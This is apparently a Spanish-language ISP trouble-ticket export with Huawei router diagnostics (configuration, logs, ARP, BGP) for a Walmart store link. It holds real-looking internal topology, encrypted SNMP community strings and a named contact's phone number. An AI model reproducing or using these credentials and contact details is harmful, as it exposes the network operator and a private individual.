 SNMP-AGENT SYS-INFO LOCATION 400 MTS AL ESTE DEL MEGASUPER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
INTERFACE WLAN-RADIO0/0/1
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.129
 NTP-SERVICE UNICAST-SERVER 10.201.11.129 PREFERENCE
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN
&lt;CC_WALMART_CR_TIENDA_0769&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 25
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[0]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[1]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[2]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[3]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN  9 2022 23:38:46-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[4]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN  9 2022 23:38:29-06:00 CC_WALMART_CR_TIENDA_0769 %%01BGP/3/STATE_CHG_UPDOWN(L)[5]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  9 2022 23:38:29-06:00 CC_WALMART_CR_TIENDA_0769 %%01BGP/3/STATE_CHG_UPDOWN(L)[6]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  9 2022 23:38:17-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[7]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
JUN  9 2022 23:38:17-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[8]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
JUN  9 2022 23:38:15-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[9]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN  9 2022 23:38:15-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[10]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/PEER_SELE(L)[11]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/STRATUM_CHANGE(L)[12]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/LEAP_CHANGE(L)[13]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN  9 2022 13:32:55-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/PEER_SELE(L)[14]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[15]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[16]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[17]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:49-06:00 CC_WALMART_CR_TIENDA_0769 %%01DEV/4/ENTUP(L)[18]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
JUN  9 2022 13:32:48-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[19]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:46-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[20]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:40-06:00 CC_WALMART_CR_TIENDA_0769 %%01RM/4/ROUTERID_CHANGE(L)[21]:THE ROUTER ID IS 10.201.11.179. (INSTANCEID=0)
JUN  9 2022 13:32:38+00:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[22]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:32+00:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[23]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
JUN  9 2022 19:32:07+00:00 CC_WALMART_CR_TIENDA_0769 %%01GTL/4/STATECHANGED(L)[24]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_0769&gt;
DISPLAY CLOCK
2022-06-09 23:43:31
THURSDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_0769&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.6.245     60DE-F329-2C69            I -         GE0/0/1
22.32.6.246     6CB2-AE46-10E3  16        D-0         GE0/0/1
10.201.11.179   60DE-F329-2C69            I -         GE0/0/0.1107
10.201.11.129   505D-AC64-7F7C  20        D-0         GE0/0/0.1107
                                          1107/-
10.201.41.179   60DE-F329-2C69            I -         GE0/0/0.2107
10.201.41.129   F4DE-AF06-70A8  15        D-0         GE0/0/0.2107
                                          2107/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_0769&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC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DOWN     WAN PRINCIPAL/_/CONTR0001542688OC                                               /_/
GE0/0/0.1107                  UP      UP       PRIMARY LINK TO MTR105
GE0/0/0.2107                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5                       *DOWN   DOWN     LAN DEL CLIENTE
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN DEL CLIENTE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_0769&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 6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07         10.201.11.179/26     UP         UP
GIGABITETHERNET0/0/0.2107         10.201.41.179/26     UP         UP
GIGABITETHERNET0/0/1              22.32.6.245/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.77.101/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           DOWN       DOWN
&lt;CC_WALMART_CR_TIENDA_0769&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.179
  PING 10.201.11.179: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.179 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 7/7/8 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.179
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.11.128/26  DIRECT  0    0             D   10.201.11.129   GIGABITETHERNET4/0/1.1107</t>
  </si>
  <si>
    <t xml:space="preserve">SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL CLIENTE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 0 HORAS Y 5 MINUTOS)
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_0769&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_0769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6.244 0.0.0.3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R6EDVWPDO&gt;95*PYLB9\!~ZF\UHMD8Z).~8E)&amp;FYDNDIOV9X+P0'~982E'N'!%^%#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DESCRIPTION LAN DEL CLIENTE
#
INTERFACE ETHERNET0/0/0
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001542688OC/_/
 SET FLOW-STAT INTERVAL 30
#
INTERFACE GIGABITETHERNET0/0/0.1107
 DESCRIPTION PRIMARY LINK TO MTR105
 DOT1Q TERMINATION VID 1107
 IP ADDRESS 10.201.11.179 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2107
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2107
 IP ADDRESS 10.201.41.179 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 2048
 IP ADDRESS 22.32.6.245 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LAN DEL CLIENTE
 SHUTDOWN
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.101 255.255.255.255
#
BGP 64528
 ROUTER-ID 10.99.77.101
 PEER 10.201.11.129 AS-NUMBER 14754
 PEER 10.201.41.129 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.101 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.129 ENABLE
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.129 NEXT-HOP-LOCAL
  PEER 10.201.41.129 ENABLE
  PEER 10.201.41.129 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.6.244 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292C69
 SNMP-AGENT COMMUNITY READ %^%#&lt;R&amp;&gt;""O7QSHESL(HPLKSI\2;GI1-W9QANUMPQA\A!&lt;~I%Z"R(Z]GF\%BBRW'GP08V^PEDV;T}SNV&lt;#PK%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION 400 MTS AL ESTE DEL MEGASUPER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
INTERFACE WLAN-RADIO0/0/1
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.129
 NTP-SERVICE UNICAST-SERVER 10.201.11.129 PREFERENCE
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN
&lt;CC_WALMART_CR_TIENDA_0769&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 25
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[0]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[1]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[2]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN  9 2022 23:38:47-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[3]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN  9 2022 23:38:46-06:00 CC_WALMART_CR_TIENDA_0769 %%01OSPF/4/NBR_CHANGE_E(L)[4]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.6.246, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN  9 2022 23:38:29-06:00 CC_WALMART_CR_TIENDA_0769 %%01BGP/3/STATE_CHG_UPDOWN(L)[5]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  9 2022 23:38:29-06:00 CC_WALMART_CR_TIENDA_0769 %%01BGP/3/STATE_CHG_UPDOWN(L)[6]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  9 2022 23:38:17-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[7]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
JUN  9 2022 23:38:17-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[8]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
JUN  9 2022 23:38:15-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[9]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN  9 2022 23:38:15-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[10]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/PEER_SELE(L)[11]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/STRATUM_CHANGE(L)[12]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN  9 2022 23:38:00-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/LEAP_CHANGE(L)[13]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN  9 2022 13:32:55-06:00 CC_WALMART_CR_TIENDA_0769 %%01NTP/4/PEER_SELE(L)[14]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[15]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[16]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:51-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[17]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:49-06:00 CC_WALMART_CR_TIENDA_0769 %%01DEV/4/ENTUP(L)[18]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
JUN  9 2022 13:32:48-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[19]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:46-06:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/IF_STATE(L)[20]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
JUN  9 2022 13:32:40-06:00 CC_WALMART_CR_TIENDA_0769 %%01RM/4/ROUTERID_CHANGE(L)[21]:THE ROUTER ID IS 10.201.11.179. (INSTANCEID=0)
JUN  9 2022 13:32:38+00:00 CC_WALMART_CR_TIENDA_0769 %%01IFNET/4/LINK_STATE(L)[22]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
JUN  9 2022 13:32:32+00:00 CC_WALMART_CR_TIENDA_0769 %%01IFPDT/4/DRVICOUTSTR(L)[23]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
JUN  9 2022 19:32:07+00:00 CC_WALMART_CR_TIENDA_0769 %%01GTL/4/STATECHANGED(L)[24]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_0769&gt;
DISPLAY CLOCK
2022-06-09 23:43:31
THURSDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_0769&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.6.245     60DE-F329-2C69            I -         GE0/0/1
22.32.6.246     6CB2-AE46-10E3  16        D-0         GE0/0/1
10.201.11.179   60DE-F329-2C69            I -         GE0/0/0.1107
10.201.11.129   505D-AC64-7F7C  20        D-0         GE0/0/0.1107
                                          1107/-
10.201.41.179   60DE-F329-2C69            I -         GE0/0/0.2107
10.201.41.129   F4DE-AF06-70A8  15        D-0         GE0/0/0.2107
                                          2107/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_0769&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC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DOWN     WAN PRINCIPAL/_/CONTR0001542688OC                                               /_/
GE0/0/0.1107                  UP      UP       PRIMARY LINK TO MTR105
GE0/0/0.2107                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5                       *DOWN   DOWN     LAN DEL CLIENTE
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN DEL CLIENTE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_0769&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 6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07         10.201.11.179/26     UP         UP
GIGABITETHERNET0/0/0.2107         10.201.41.179/26     UP         UP
GIGABITETHERNET0/0/1              22.32.6.245/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.77.101/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           DOWN       DOWN
&lt;CC_WALMART_CR_TIENDA_0769&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.179
  PING 10.201.11.179: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.179 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 7/7/8 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.179
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.11.128/26  DIRECT  0    0             D   10.201.11.129   GIGABITETHERNET4/0/1.1107	</t>
  </si>
  <si>
    <t>F4596520</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO INDICA QUE YA ENVIARON VALIDACION CON CL Y ESTAN A LA ESPERA QUE CL FINAL VALIDE PARA PODER RESPONDERNOS Y CERRAR EL TICKET **
-ID 2001351251
**</t>
  </si>
  <si>
    <t>F4596523</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE VALIDARA SI SE TUVO ALGUNA AFECTACION A NIVEL LIGICO
.
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.76.176.129
  PING 10.76.176.129: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.76.176.129 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.76.176.129
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.76.176.129/32  DIRECT  0    0                 0.0.0.0         VLANIF402			</t>
  </si>
  <si>
    <t>NO SE TIENE NINGUAN EVENTO A NIVEL BGP DEL ENLACE SE PROCEDE A VALIDAR CON CLIENTE POR CORREO.
&lt;HHERCRMPN1W1N01O01EIM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE DATOS_WALMART  PEER | IN 10.76.176.129
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.36.6
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE DATOS_WALMART, ROUTER ID 10.179.36.6:
 TOTAL NUMBER OF PEERS : 293                 PEERS IN ESTABLISHED STATE : 288
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.76.176.129                    4       65412   234421   283570     0 0912H21M ESTABLISHED      108
&lt;HHERCRMPN1W1N01O01EIM1&gt;</t>
  </si>
  <si>
    <t>F4596528</t>
  </si>
  <si>
    <t>***--- CL COMPARTE CONTACTO LOCAL --***
